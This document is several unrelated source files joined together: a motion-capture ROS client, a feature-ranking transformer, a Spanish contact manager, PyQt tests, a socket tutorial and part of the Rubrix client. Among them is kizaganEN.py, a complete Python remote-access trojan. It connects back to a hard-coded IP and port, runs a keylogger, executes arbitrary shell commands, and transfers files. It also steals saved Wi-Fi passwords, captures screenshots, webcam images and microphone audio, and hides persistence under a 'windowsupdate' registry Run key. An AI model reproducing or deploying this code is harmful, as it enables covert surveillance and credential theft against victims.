        # print( "Received frame for rigid body", new_id )
        # Store the latest pose in the module-level dict keyed by rigid-body id.
        body[new_id] = [position, rotation]
        # print( "Received frame for rigid body", new_id," ",position," ",rotation )
    def get_body_frame(self):
        """Return the shared id -> [position, rotation] dict."""
        return body
    def add_lists(self,totals, totals_tmp):
        """Element-wise add the first three entries of totals_tmp into totals
        (mutates and returns totals)."""
        totals[0]+=totals_tmp[0]
        totals[1]+=totals_tmp[1]
        totals[2]+=totals_tmp[2]
        return totals
    def print_configuration(self,natnet_client):
        """Pretty-print the NatNet client/server connection settings."""
        print("Connection Configuration:")
        print(" Client: %s"% natnet_client.local_ip_address)
        print(" Server: %s"% natnet_client.server_ip_address)
        print(" Command Port: %d"% natnet_client.command_port)
        print(" Data Port: %d"% natnet_client.data_port)
        if natnet_client.use_multicast:
            print(" Using Multicast")
            print(" Multicast Group: %s"% natnet_client.multicast_address)
        else:
            print(" Using Unicast")
        #NatNet Server Info
        application_name = natnet_client.get_application_name()
        nat_net_requested_version = natnet_client.get_nat_net_requested_version()
        nat_net_version_server = natnet_client.get_nat_net_version_server()
        server_version = natnet_client.get_server_version()
        print(" NatNet Server Info")
        print(" Application Name %s" %(application_name))
        print(" NatNetVersion %d %d %d %d"% (nat_net_version_server[0], nat_net_version_server[1], nat_net_version_server[2], nat_net_version_server[3]))
        print(" ServerVersion %d %d %d %d"% (server_version[0], server_version[1], server_version[2], server_version[3]))
        print(" NatNet Bitstream Requested")
        print(" NatNetVersion %d %d %d %d"% (nat_net_requested_version[0], nat_net_requested_version[1],\
            nat_net_requested_version[2], nat_net_requested_version[3]))
        #print("command_socket = %s"%(str(natnet_client.command_socket)))
        #print("data_socket = %s"%(str(natnet_client.data_socket)))
    def request_data_descriptions(self,s_client):
        # Request the model definitions
        s_client.send_request(s_client.command_socket, s_client.NAT_REQUEST_MODELDEF, "", (s_client.server_ip_address, s_client.command_port) )
    def my_parse_args(self,arg_list, args_dict):
        # set up base values
        # Positional CLI args: [1] server IP, [2] client IP,
        # [3] transport mode ("u..." selects unicast, anything else multicast).
        arg_list_len=len(arg_list)
        if arg_list_len>1:
            args_dict["serverAddress"] = arg_list[1]
        if arg_list_len>2:
            args_dict["clientAddress"] = arg_list[2]
        if arg_list_len>3:
            if len(arg_list[3]):
                args_dict["use_multicast"] = True
                if arg_list[3][0].upper() == "U":
                    args_dict["use_multicast"] = False
        return args_dict
if __name__ == "__main__":
    # Hard-coded LAN addresses of this machine and the Motive server.
    optionsDict = {}
    optionsDict["clientAddress"] = "10.191.76.66"
    optionsDict["serverAddress"] = "10.191.76.176"
    optionsDict["use_multicast"] = False
    # This will create a new NatNet client
    #optionsDict = my_parse_args(sys.argv, optionsDict)
    streaming_client = NatNetClient()
    streaming_client.set_client_address(optionsDict["clientAddress"])
    streaming_client.set_server_address(optionsDict["serverAddress"])
    streaming_client.set_use_multicast(optionsDict["use_multicast"])
    # Configure the streaming client to call our rigid body handler on the emulator to send data out.
    mymocap = mocap_reader(optionsDict["clientAddress"],optionsDict["serverAddress"])
    streaming_client.new_frame_listener = mymocap.receive_new_frame
    streaming_client.rigid_body_listener = mymocap.receive_rigid_body_frame
    streaming_client.set_print_level(0)
    # Start up the streaming client now that the callbacks are set up.
    # This will run perpetually, and operate on a separate thread.
    is_running = streaming_client.run()
    if not is_running:
        print("ERROR: Could not start streaming client.")
        # NOTE(review): sys.exit is caught right away by "except SystemExit",
        # so execution falls through instead of terminating — confirm intent.
        try:
            sys.exit(1)
        except SystemExit:
            print("...")
        finally:
            print("exiting")
    time.sleep(1)
    if streaming_client.connected() is False:
        print("ERROR: Could not connect properly. Check that Motive streaming is on.")
        # NOTE(review): same swallowed sys.exit pattern as above.
        try:
            sys.exit(2)
        except SystemExit:
            print("...")
        finally:
            print("exiting")
    streaming_client.get_infos()
    time.sleep(1)
    try:
        body_ros = Pose()
        # Republish the tracked pose at ~5 Hz until interrupted.
        while True:
            time.sleep(0.2)
            # NOTE(review): rigid-body id 13 is hard-coded — confirm it matches
            # the asset id configured in Motive.
            body_ros.position.x = body[13][0][0]
            body_ros.position.y = body[13][0][1]
            body_ros.position.z = body[13][0][2]
            body_ros.orientation.x = body[13][1][0]
            body_ros.orientation.y = body[13][1][1]
            body_ros.orientation.z = body[13][1][2]
            body_ros.orientation.w = body[13][1][3]
            mymocap.pub.publish(body_ros)
    except (KeyboardInterrupt, SystemExit):
        streaming_client.shutdown()
        print("killed")
1858113091 | import subprocess
import os
import simplejson
import base64
import socket
from util import kg
import time
import threading
import pyttsx3
from PIL import ImageGrab
import sys
import shutil
import cv2
from util import sound_record
import tkinter
ip = "192.168.1.105" #Change this value according to yourself.
port = 4444 #Change this value according to yourself.
my_thread = threading.Thread(target=kg.kg_Start)
my_thread.start()
class mySocket():
def __init__(self,ip,port):
self.connection = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
self.connection.connect((ip,port))
self.kg_file = os.environ["appdata"]+"\\windowslogs.txt"
self.tro_file = os.environ["appdata"]+"\\windowsupdate.exe"
self.ss_file = os.environ["appdata"]+"\\update.png"
self.camera_file = os.environ["appdata"]+"\\windowsupdate.png"
self.sound_file = os.environ["appdata"]+"\\windowssounds.wav"
self.Mic_Question()
self.Chat_Port_Question()
def Mic_Question(self):
question_answer = self.Get_Json()
if question_answer == "Y" or question_answer == "y":
my_thread2 = threading.Thread(target=self.Start_Record)
my_thread2.start()
def Chat_Port_Question(self):
question_answer = self.Get_Json()
if question_answer == 5555:
self.chat_port = 5555
else:
self.chat_port = question_answer
def Execute_Command(self,command):
command_output = subprocess.check_output(command,shell=True)
return command_output.decode("Latin1")
def Send_Json(self,data):
json_data = simplejson.dumps(data)
self.connection.send(json_data.encode("utf-8"))
def Get_Json(self):
json_data = ""
while True:
try:
json_data = json_data + self.connection.recv(1048576).decode()
return simplejson.loads(json_data)
except ValueError:
continue
def Get_File_Contents(self, path):
with open(path, "rb") as file:
return base64.b64encode(file.read())
def Save_File(self, path, content):
with open(path, "wb") as file:
file.write(base64.b64decode(content))
return "[+]The file was uploaded on victim's current directory."
def Execute_cd(self, path):
os.chdir(path)
return "[+]Changed directory to : " + path
def Make_Directory(self, file_name):
os.mkdir(file_name)
return "[+]Directory created : " + file_name
def Remove_Directory(self, file_name):
os.rmdir(file_name)
return "[+]Directory removed : " + file_name
def Remove_File(self, name):
os.remove(name)
return "[+]Removed : " + name
def Rename_File(self, name1, name2):
os.rename(name1, name2)
return "[+]Name changed.\n" + name1 + "→→→→→→" + name2
def Open_File(self, file_name):
os.system(file_name)
return "[+]The file opened on victim's computer. : " + file_name
def Pwd(self):
return os.getcwd()
def Check(self):
if os.name == 'nt':
return "Victim is a windows."
elif os.name == 'posix':
return "Victim is a linux distribution"
def Kg_Start_Func(self):
kg.kg_Start()
def Read_Kg(self):
with open(self.kg_file, "r",encoding="utf-8") as file:
return file.read()
def Talk(self,words):
engine = pyttsx3.init()
engine.setProperty("rate", 120)
engine.say(words)
engine.runAndWait()
return "[+]The sound played on victim's computer."
def Permanance(self):
if os.path.exists(self.tro_file):
return "[+]Permanance is activated already."
if not os.path.exists(self.tro_file):
shutil.copyfile(sys.executable, self.tro_file)
regedit_command = "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v windowsupdate /t REG_SZ /d " + self.tro_file
subprocess.call(regedit_command,shell=True)
return "[+]Permanance activated."
def Remove_Permanance(self):
if os.path.exists(self.tro_file):
regedit_command = "reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v windowsupdate /f"
subprocess.call(regedit_command,shell=True)
os.remove(self.tro_file)
return "[+]Permanance removed and it will not work every time the victim boots up his computer."
else:
return "[+]Permanance not found."
def Start_Record(self):
self.start = sound_record.Recording()
self.start.Start_Record()
def Chat_Send_Messages(self):
message = self.client_message_entry.get()
self.messages.insert(tkinter.END, "\n" + "You:" + message)
self.chat_connection.send(message.encode())
self.messages.see("end")
def Chat_Get_Messages(self):
while True:
message = self.chat_connection.recv(1024).decode()
if message == "exit":
self.chat_gui.destroy()
self.messages.insert(tkinter.END, "\n" + "Hacker:" + message)
self.messages.see("end")
def Chat(self):
self.chat_connection = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
self.chat_connection.connect((ip,self.chat_port))
self.chat_gui = tkinter.Tk()
self.chat_gui.resizable(False, False)
self.chat_gui.config(bg="#D9D8D7")
self.chat_gui.geometry("600x300")
self.chat_gui.title("You are chatting with hacker.")
self.messages = tkinter.Text(self.chat_gui, width=71, height=10, fg="#0E6B0E", bg="#000000")
self.messages.place(x=0, y=0)
self.messages.insert("1.0","Hacker wants to chat with you.Write your message 'your message' part and click the 'Send Message'.")
self.your_message_label = tkinter.Label(self.chat_gui, width=20, text="Your Message :", fg="#0D1C6E")
self.your_message_label.place(x=-30, y=250)
self.client_message_entry = tkinter.Entry(self.chat_gui, width=50)
self.client_message_entry.place(x=90, y=250)
self.send_button = tkinter.Button(self.chat_gui, width=20, text="Send Message", command=self.Chat_Send_Messages, bg="#000000", fg="#0E6B0E")
self.send_button.place(x=400, y=245)
self.chat_thread = threading.Thread(target=self.Chat_Get_Messages)
self.chat_thread.start()
self.chat_gui.mainloop()
def Client_Start(self):
while True:
command = self.Get_Json()
try:
if command[0] == "cd" and len(command) > 1:
command_output = self.Execute_cd(command[1])
elif command[0] == "download":
command_output = self.Get_File_Contents(command[1])
elif command[0] == "upload":
command_output = self.Save_File(command[1], command[2])
elif command[0] == "mkdir":
command_output = self.Make_Directory(command[1])
elif command[0] == "rmdir":
command_output = self.Remove_Directory(command[1])
elif command[0] == "rm":
command_output = self.Remove_File(command[1])
elif command[0] == "rename":
command_output = self.Rename_File(command[1], command[2])
elif command[0] == "open":
command_output = self.Open_File(command[1])
elif command[0] == "pwd":
command_output = self.Pwd()
elif command[0] == "system":
command_output = self.Check()
elif command[0] == "read_kg":
command_output = self.Read_Kg()
elif command[0] == "talk":
command_output = self.Talk(command[1:])
elif command[0] == "show_wifis":
wifis = subprocess.check_output(["netsh", "wlan", "show", "profiles"]).decode()
wifi = wifis.split("\n")
profiles = [i.split(":")[1][1:-1] for i in wifi if "All User Profile" in i]
profile_str = " ".join(profiles)
command_output = "Wifi Networks : \n\n\n"
command_output +=profile_str + "\n\n\n"
command_output += "Wifi passwords(in order of) :\n\n"
for i in profiles:
try:
result = subprocess.check_output(["netsh", "wlan", "show", "profile", i, "key=clear"]).decode("utf-8").split("\n")
result = [b.split(":")[1][1:-1] for b in result if "Key Content" in b]
result_str = " ".join(result)
if result_str == "":
result_str = "No password"
command_output += "\t" + result_str
except subprocess.CalledProcessError:
print("Error.")
elif command[0] == "get_ss":
ImageGrab.grab().save(self.ss_file)
command_output=self.Get_File_Contents(self.ss_file)
os.remove(self.ss_file)
elif command[0] == "save_kg":
command_output = self.Get_File_Contents(self.kg_file)
os.remove(self.kg_file)
elif command[0] == "permanance":
command_output = self.Permanance()
elif command[0] == "remove_permanance":
command_output = self.Remove_Permanance()
elif command[0] == "get_camera_image":
camera = cv2.VideoCapture(0)
result, image = camera.read()
if result:
cv2.imwrite(self.camera_file,image)
command_output = self.Get_File_Contents(self.camera_file)
os.remove(self.camera_file)
else:
command_output = "[-]Can not reach the camera."
elif command[0] == "download_sound_recording":
self.start.Stop_Record()
command_output = self.Get_File_Contents(self.sound_file)
os.remove(self.sound_file)
elif command[0] == "chat":
self.Chat()
else:
command_output = self.Execute_Command(command)
except Exception:
command_output = "Unknown command.For command list use 'help' command."
self.Send_Json(command_output)
self.connection.close()
def Try_Connection():
while True:
time.sleep(5)
try:
mysocket = mySocket(ip,port)
mysocket.Client_Start()
except Exception:
Try_Connection()
def Permanance():
tro_file = os.environ["appdata"] + "\\windowsupdate.exe"
regedit_command = "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v windowsupdate /t REG_SZ /d " + tro_file
if not os.path.exists(tro_file):
shutil.copyfile(sys.executable,tro_file)
subprocess.call(regedit_command,shell=True)
if os.path.exists(tro_file):
pass
def Open_Added_File():
added_file = sys._MEIPASS + "\\examplefile.pdf" #Enter the file after '\\' to combine with image,pdf etc.
subprocess.Popen(added_file,shell=True)
#Open_Added_File() # And remove the '#' before the code.(If you activated it.)
Permanance()
Try_Connection()
| st4inl3s5/kizagan | kizaganEN.py | kizaganEN.py | py | 11,980 | python | en | code | 72 | github-code | 36 |
26610494943 | # This class implements the adaptive rank transformation used in classifier ANOVA_subset_ranking_lr
import sklearn.base as base
import scipy
import time
import logging
import torch
from utilities.optirank.ranking_multiplication import ranking_transformation
import numpy as np
import statsmodels.api as sm
from statsmodels.formula.api import ols
import pandas as pd
def calculate_F_ANOVA(X, label, dataset):
    """Per-feature ANOVA F statistic for the dataset-source main effect.

    For each column of ``X`` a two-way ANOVA (label, dataset, and their
    interaction) is fitted, and the F value of the ``dataset`` main effect is
    collected: the larger the F, the stronger the shift between datasets.

    :param X: n x d numpy array of feature values.
    :param label: length-n array with class labels.
    :param dataset: length-n array naming each observation's source dataset.
    :return: length-d numpy array with one F value per feature.
    """
    f_per_feature = []
    for feature_idx in range(X.shape[1]):
        frame = pd.DataFrame(
            {"label": label, "dataset": dataset, "expr": X[:, feature_idx].flatten()}
        )
        fitted = ols('expr ~ C(label) + C(dataset) + C(label):C(dataset)', data=frame).fit()
        anova_table = sm.stats.anova_lm(fitted, typ=2)
        f_per_feature.append(anova_table.loc["C(dataset)", "F"])
    return np.array(f_per_feature)
def merge_two_datasets(X, y, X_other, y_other, mask_dataset_other):
    """Return (X, y, dataset) with a per-sample dataset tag ("0" or "1").

    Two modes of usage:
      * ``X_other``/``y_other`` given (``mask_dataset_other`` unused): the
        second dataset is stacked below the first into new arrays, and its
        samples are tagged "1".
      * ``X_other`` is None: ``X``/``y`` already mix both datasets and
        ``mask_dataset_other`` is a boolean mask selecting the rows that
        belong to dataset "1".
    """
    if X_other is None:
        tags = np.repeat("0", len(y))
        tags[mask_dataset_other] = "1"
        return X, y, tags
    stacked_X = np.vstack([X, X_other])
    merged_y = np.concatenate([y, y_other])
    tags = np.concatenate([np.repeat("0", len(y)), np.repeat("1", len(y_other))])
    return stacked_X, merged_y, tags
class ANOVA_subset_ranking(base.BaseEstimator, base.TransformerMixin):
def __init__(self, fitted=False, X=None, y=None, sum_gamma=None, perc_gamma=None, time_economy=False, X_other=None,
y_other=None, mask_dataset_other=None):
"""
transformer that selects the features that are the least influenced by the dataset source, based on a two way
ANOVA test that estimates the dependence of each feature on the dataset.
To function, X,y values must be provided for two dataset-sources, and the dataset effect is estimated.
There are two modes of use:
1) with X_other, y_other
2) with mask_dataset_other, which indicate which samples in X,y belong to the other dataset
These two modes permit to include (or not) the other dataset in the transformed data.
:param fitted:
:param X: nxd numpy array with data
:param y: n numpy array with label
:param sum_gamma: integer indicating how many features to select as ranking reference.
:param perc_gamma: float indicating which percentage of features to use as ranking reference.
:param time_economy: if True, X and y are cached, and the F-values are not re-calculated for subsequent values of hyperparameters gamma.
:param X_other: nxd numpy array with data
:param y_other: n numpy array with label
:param mask_dataset_other: boolean mask that selects the "secondary dataset" samples.
"""
super(ANOVA_subset_ranking, self).__init__()
self.sum_gamma = sum_gamma
self.perc_gamma = perc_gamma
self.time_economy = time_economy
self.fitted = fitted
self.X = X
self.y = y
self.X_other = X_other
self.y_other = y_other
self.mask_dataset_other = mask_dataset_other
def fit(self, X, y):
n_genes = X.shape[1]
# sum_gamma-perc_gamma agreement
if self.sum_gamma is None:
self.sum_gamma = int(self.perc_gamma * n_genes)
if isinstance(y, list):
y = np.array(y)
if self.time_economy:
start = time.time()
if self.fitted == False or not (np.all(X == self.X)) or not (
np.all(y == self.y)): # hope it doesn't throw an error when X is not fitted
# storing X and parameters
self.X = X
self.y = y
# calculate F values
X_merged, y_merged, dataset_merged = merge_two_datasets(X, y, self.X_other, self.y_other,
self.mask_dataset_other)
self.F_ = calculate_F_ANOVA(X_merged, y_merged, dataset_merged)
stop = time.time()
logging.debug('__time_economy:calculation:{}'.format(stop - start))
else:
stop = time.time()
logging.debug('__time_economy:rentability:{}'.format(stop - start))
else:
X_merged, y_merged, dataset_merged = merge_two_datasets(X, y, self.X_other, self.y_other,
self.mask_dataset_other)
self.F_ = calculate_F_ANOVA(X_merged, y_merged, dataset_merged)
self.fitted = True
return self
    def transform(self, X):
        """Rank-transform X against the gamma subset selected from the F-values.

        Selects the first ``sum_gamma`` features of ``F_.argsort()`` as the
        reference subset, stores it as a binary mask in ``self.gamma_``, and
        returns X ranked against that subset.

        NOTE(review): ``argsort`` is ascending, so this keeps the features with
        the *lowest* F-values — confirm this is the intended ranking reference
        (rather than the most class-discriminative features).
        """
        n_genes = X.shape[1]
        ranking_F_indices = self.F_.argsort()
        # Clamp to n_genes in case sum_gamma exceeds the feature count.
        selection_indices = ranking_F_indices[0:np.min([self.sum_gamma, n_genes])]
        # converting reference genes to a binary gamma mask
        gamma = np.zeros(n_genes, dtype="bool")
        gamma[selection_indices] = True
        self.gamma_ = torch.Tensor(gamma)
        # ranking X_expr wrt gamma (in "avg" mode, descending "d")
        X_ranked = ranking_transformation(X, self.gamma_, "avg", "d")
        return X_ranked
    def to_lightweight(self, copy=False):
        """Drop the cached training arrays to shrink the object (e.g. for pickling).

        Only the fitted artifacts ``gamma_`` and ``F_`` are needed at transform
        time, so the raw data references can be released.

        :param copy: if True, return a new fitted instance carrying only
            ``gamma_``/``F_``; if False, strip the data from this instance
            in place and return it.
        """
        if copy:
            new_lightweight = ANOVA_subset_ranking(fitted=True, X=None, y=None, sum_gamma=self.sum_gamma,
                                                   perc_gamma=self.perc_gamma, time_economy=self.time_economy,
                                                   X_other=None, y_other=None)
            new_lightweight.gamma_ = self.gamma_
            new_lightweight.F_ = self.F_
            return new_lightweight
        else:
            self.X_other = None
            self.y_other = None
            self.X = None
            self.y = None
            return self
| paolamalsot/optirank | utilities/ANOVA_subset_ranking.py | ANOVA_subset_ranking.py | py | 6,722 | python | en | code | 0 | github-code | 36 |
26451217511 | # Función para agregar un contacto a la lista
def agregar_contacto(nombre, telefono, lista_contactos):
    """Append a new contact record to the list and print a confirmation."""
    lista_contactos.append({"Nombre": nombre, "Teléfono": telefono})
    print(f"Contacto {nombre} agregado.")
# Función para eliminar un contacto de la lista
def eliminar_contacto(nombre, lista_contactos):
    """Remove the first contact whose name matches *nombre* and report the outcome."""
    objetivo = next((c for c in lista_contactos if c["Nombre"] == nombre), None)
    if objetivo is None:
        print(f"Contacto {nombre} no encontrado.")
        return
    lista_contactos.remove(objetivo)
    print(f"Contacto {nombre} eliminado.")
# Función para buscar un contacto en la lista
def buscar_contacto(nombre, lista_contactos):
    """Print the first contact matching *nombre*, or a not-found message."""
    for registro in lista_contactos:
        if registro["Nombre"] != nombre:
            continue
        print("Contacto encontrado:")
        print(registro)
        return
    print(f"Contacto {nombre} no encontrado.")
# Función para mostrar la lista de contactos
def mostrar_contactos(lista_contactos):
    """Print every contact, or a message when the list is empty."""
    if lista_contactos:
        print("Lista de contactos:")
        for registro in lista_contactos:
            print(registro)
    else:
        print("La lista de contactos está vacía.")
# Lista para almacenar los contactos
lista_de_contactos = []
# Menú principal
while True:
print("\n*** GESTIÓN DE CONTACTOS ***")
print("1. Agregar contacto")
print("2. Eliminar contacto")
print("3. Buscar contacto")
print("4. Mostrar contactos")
print("5. Salir")
opcion = input("Ingrese el número de la opción deseada: ")
if opcion == "1":
nombre = input("Ingrese el nombre del contacto: ")
telefono = input("Ingrese el teléfono del contacto: ")
agregar_contacto(nombre, telefono, lista_de_contactos)
elif opcion == "2":
nombre = input("Ingrese el nombre del contacto a eliminar: ")
eliminar_contacto(nombre, lista_de_contactos)
elif opcion == "3":
nombre = input("Ingrese el nombre del contacto a buscar: ")
buscar_contacto(nombre, lista_de_contactos)
elif opcion == "4":
mostrar_contactos(lista_de_contactos)
elif opcion == "5":
print("¡Hasta luego!")
break
else:
print("Opción no válida. Por favor, ingrese un número del 1 al 5.")
| mateotettamanti/gestioncontacts | main.py | main.py | py | 2,271 | python | es | code | 0 | github-code | 36 |
34450828117 | import pytest
from PyQt6.QtTest import QTest
from PyQt6.QtWidgets import QLineEdit
from pytestqt import qtbot
from main import OLXWork, OLXSettings
from PyQt6 import QtCore
def test_olxwork_button_stop_clicked(qtbot):
    """Clicking stop hides the work window and shows the parent settings window."""
    parent = OLXSettings()
    widget = OLXWork(parent= parent)
    widget.show()
    qtbot.addWidget(widget)
    assert widget.isVisible()
    widget.start_timer()
    qtbot.mouseClick(widget.button_stop, QtCore.Qt.MouseButton.LeftButton)
    assert not widget.isVisible()
    assert parent.isVisible()
def test_olxwork_animation_label(qtbot):
    """The progress label cycles base text -> dotted variants -> base text."""
    widget = OLXWork()
    assert widget.in_progress_label.text() == "Program w trakcie pracy"
    widget.animation_label_counter = 0
    widget.animation_label()
    assert widget.in_progress_label.text() == "Program w trakcie pracy."
    # Three more ticks wrap the animation counter back to the un-dotted text.
    for _ in range(3):
        widget.animation_label()
    assert widget.in_progress_label.text() == "Program w trakcie pracy"
def test_olxwork_start_timer(qtbot):
    """start_timer() activates both the label-animation and OLX polling timers."""
    widget = OLXWork()
    qtbot.addWidget(widget)
    widget.start_timer()
    assert widget.animation_label_timer.isActive()
    assert widget.room_olx_timer.isActive()
def test_olxwork_stop_timer(qtbot):
    """stop_timer() deactivates both timers previously started."""
    widget = OLXWork()
    qtbot.addWidget(widget)
    widget.start_timer()
    widget.stop_timer()
    assert not widget.animation_label_timer.isActive()
    assert not widget.room_olx_timer.isActive()
def test_olxwork_update_data_olxwork(qtbot):
    """update_data_olxwork() stores the search URL and the city on the widget."""
    widget = OLXWork()
    qtbot.addWidget(widget)
    widget.update_data_olxwork("http://something.pl","City")
    assert widget.city == "City"
    assert widget.url == "http://something.pl"
def test_olxsettings_button_start_clicked(qtbot):
    """Start button hands control from the settings window to the work window."""
    widget = OLXSettings()
    son = OLXWork(parent=widget)
    widget.olx_work = son
    qtbot.keyClicks(widget.city, "Zakopane")
    widget.show()
    assert widget.isVisible()
    qtbot.addWidget(widget)
    qtbot.mouseClick(widget.button_start,QtCore.Qt.MouseButton.LeftButton)
    assert son.isVisible()
    assert not widget.isVisible()
def test_olxsettings_check_city(qtbot):
    """check_city() returns 0 for a recognized city name."""
    widget = OLXSettings()
    widget.city = QLineEdit()
    widget.city.setText("Warszawa")
    assert widget.check_city() == 0
def test_olxsettings_check_city_empty(qtbot):
    """check_city() returns 1 when the city field is empty."""
    widget = OLXSettings()
    widget.city = QLineEdit()
    widget.city.setText("")
    assert widget.check_city() == 1
def test_olxsettings_check_city_invalid(qtbot):
    """check_city() returns 1 for a name outside the known city set."""
    widget = OLXSettings()
    widget.city = QLineEdit()
    widget.city.setText("InvalidCity")
    assert widget.check_city() == 1
def test_olxsettings_main_window_type_index_changed_visible(qtbot):
    """Changing the offer-type combo toggles rooms/m2 input visibility."""
    widget = OLXSettings()
    qtbot.addWidget(widget)
    widget.show()
    # Default type (index 0): area fields visible, room fields hidden.
    assert widget.type.currentIndex() == 0
    assert not widget.rooms.isVisible()
    assert not widget.rooms_label.isVisible()
    assert widget.m_2_from.isVisible()
    assert widget.m_2_to.isVisible()
    # Move to the next type: room fields become visible as well.
    qtbot.waitUntil(lambda: widget.type.count() > 0)
    qtbot.mouseClick(widget.type, QtCore.Qt.MouseButton.LeftButton)
    qtbot.keyClick(widget.type, QtCore.Qt.Key.Key_Down)
    qtbot.keyClick(widget.type, QtCore.Qt.Key.Key_Return)
    assert widget.rooms.isVisible()
    assert widget.rooms_label.isVisible()
    assert widget.m_2_from.isVisible()
    assert widget.m_2_to.isVisible()
    # Move once more: all four inputs hidden for this offer type.
    qtbot.waitUntil(lambda: widget.type.count() > 0)
    qtbot.mouseClick(widget.type, QtCore.Qt.MouseButton.LeftButton)
    qtbot.keyClick(widget.type, QtCore.Qt.Key.Key_Down)
    qtbot.keyClick(widget.type, QtCore.Qt.Key.Key_Return)
    assert not widget.rooms.isVisible()
    assert not widget.rooms_label.isVisible()
    assert not widget.m_2_from.isVisible()
    assert not widget.m_2_to.isVisible()
8492180165 | print('\n\n****************************************')
''' Python Socket Objects: are just like files, you can read and write to them.
These are the entry point for sending and receiving data to a client.
Python -> Clients Job:
connect --> send --> receive
'''
print(' Example of a simple client:')
'''localhost is our computer, to find an open port:
cmd+space --> Search "Network Utility
Click: "Port Scan
Open Port Search in: 127.0.0.1
It will return a list of open ports on your computer.'''
# Mini client program — requires the companion miniserver.py to be listening
# on the port used below.
import socket
# AF_INET = IPv4 addressing, SOCK_STREAM = TCP.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Connect to the local server on port 5037.
s.connect(('localhost', 5037))
# Sockets carry raw bytes, hence the bytes literal payload.
s.send(b'Happy Hacking')
# Read up to 1024 bytes of the server's reply (recv may return fewer).
# NOTE(review): the socket is never closed if connect/send raises — real code
# should use try/finally or `with socket.socket(...) as s:`.
data = s.recv(1024)
s.close()
print('Received:')
print(data)
22330605569 | import asyncio
import logging
import os
import re
import warnings
from asyncio import Future
from functools import wraps
from inspect import signature
from typing import Any, Callable, Dict, Iterable, List, Optional, Tuple, Union
from tqdm.auto import tqdm
from rubrix._constants import (
DATASET_NAME_REGEX_PATTERN,
DEFAULT_API_KEY,
RUBRIX_WORKSPACE_HEADER_NAME,
)
from rubrix.client.apis.datasets import Datasets
from rubrix.client.apis.metrics import MetricsAPI
from rubrix.client.apis.searches import Searches
from rubrix.client.datasets import (
Dataset,
DatasetForText2Text,
DatasetForTextClassification,
DatasetForTokenClassification,
)
from rubrix.client.metrics.models import MetricResults
from rubrix.client.models import (
BulkResponse,
Record,
Text2TextRecord,
TextClassificationRecord,
TokenClassificationRecord,
)
from rubrix.client.sdk.client import AuthenticatedClient
from rubrix.client.sdk.commons.api import async_bulk
from rubrix.client.sdk.commons.errors import RubrixClientError
from rubrix.client.sdk.datasets import api as datasets_api
from rubrix.client.sdk.datasets.models import CopyDatasetRequest, TaskType
from rubrix.client.sdk.metrics import api as metrics_api
from rubrix.client.sdk.metrics.models import MetricInfo
from rubrix.client.sdk.text2text import api as text2text_api
from rubrix.client.sdk.text2text.models import (
CreationText2TextRecord,
Text2TextBulkData,
Text2TextQuery,
)
from rubrix.client.sdk.text_classification import api as text_classification_api
from rubrix.client.sdk.text_classification.models import (
CreationTextClassificationRecord,
LabelingRule,
LabelingRuleMetricsSummary,
TextClassificationBulkData,
TextClassificationQuery,
)
from rubrix.client.sdk.token_classification import api as token_classification_api
from rubrix.client.sdk.token_classification.models import (
CreationTokenClassificationRecord,
TokenClassificationBulkData,
TokenClassificationQuery,
)
from rubrix.client.sdk.users import api as users_api
from rubrix.client.sdk.users.models import User
from rubrix.utils import setup_loop_in_thread
_LOGGER = logging.getLogger(__name__)
class _RubrixLogAgent:
    """Runs ``Api.log_async`` on a dedicated background event loop.

    A private event loop is started in its own thread at construction time so
    that synchronous callers can schedule logging coroutines without blocking.
    """

    def __init__(self, api: "Api"):
        self.__api__ = api
        # Background asyncio loop + the thread driving it (see setup_loop_in_thread).
        self.__loop__, self.__thread__ = setup_loop_in_thread()

    @staticmethod
    async def __log_internal__(api: "Api", *args, **kwargs):
        """Await the actual bulk logging; log and re-raise any failure."""
        try:
            return await api.log_async(*args, **kwargs)
        except Exception as ex:
            _LOGGER.error(
                f"Cannot log data {args, kwargs}\n"
                f"Error of type {type(ex)}\n: {ex}. ({ex.args})"
            )
            raise ex

    def log(self, *args, **kwargs) -> Future:
        """Schedule a logging coroutine on the background loop; returns its Future."""
        return asyncio.run_coroutine_threadsafe(
            self.__log_internal__(self.__api__, *args, **kwargs), self.__loop__
        )
class Api:
# Larger sizes will trigger a warning
_MAX_CHUNK_SIZE = 5000
def __init__(
self,
api_url: Optional[str] = None,
api_key: Optional[str] = None,
workspace: Optional[str] = None,
timeout: int = 60,
extra_headers: Optional[Dict[str, str]] = None,
):
"""Init the Python client.
We will automatically init a default client for you when calling other client methods.
The arguments provided here will overwrite your corresponding environment variables.
Args:
api_url: Address of the REST API. If `None` (default) and the env variable ``RUBRIX_API_URL`` is not set,
it will default to `http://localhost:6900`.
api_key: Authentification key for the REST API. If `None` (default) and the env variable ``RUBRIX_API_KEY``
is not set, it will default to `rubrix.apikey`.
workspace: The workspace to which records will be logged/loaded. If `None` (default) and the
env variable ``RUBRIX_WORKSPACE`` is not set, it will default to the private user workspace.
timeout: Wait `timeout` seconds for the connection to timeout. Default: 60.
extra_headers: Extra HTTP headers sent to the server. You can use this to customize
the headers of Rubrix client requests, like additional security restrictions. Default: `None`.
Examples:
>>> import rubrix as rb
>>> rb.init(api_url="http://localhost:9090", api_key="4AkeAPIk3Y")
>>> # Customizing request headers
>>> headers = {"X-Client-id":"id","X-Secret":"secret"}
>>> rb.init(api_url="http://localhost:9090", api_key="4AkeAPIk3Y", extra_headers=headers)
"""
api_url = api_url or os.getenv("RUBRIX_API_URL", "http://localhost:6900")
# Checking that the api_url does not end in '/'
api_url = re.sub(r"\/$", "", api_url)
api_key = api_key or os.getenv("RUBRIX_API_KEY", DEFAULT_API_KEY)
workspace = workspace or os.getenv("RUBRIX_WORKSPACE")
headers = extra_headers or {}
self._client: AuthenticatedClient = AuthenticatedClient(
base_url=api_url,
token=api_key,
timeout=timeout,
headers=headers.copy(),
)
self._user: User = users_api.whoami(client=self._client)
if workspace is not None:
self.set_workspace(workspace)
self._agent = _RubrixLogAgent(self)
def __del__(self):
if hasattr(self, "_client"):
del self._client
if hasattr(self, "_agent"):
del self._agent
@property
def client(self):
"""The underlying authenticated client"""
return self._client
@property
def datasets(self) -> Datasets:
return Datasets(client=self._client)
@property
def searches(self):
return Searches(client=self._client)
@property
def metrics(self):
return MetricsAPI(client=self.client)
    def set_workspace(self, workspace: str):
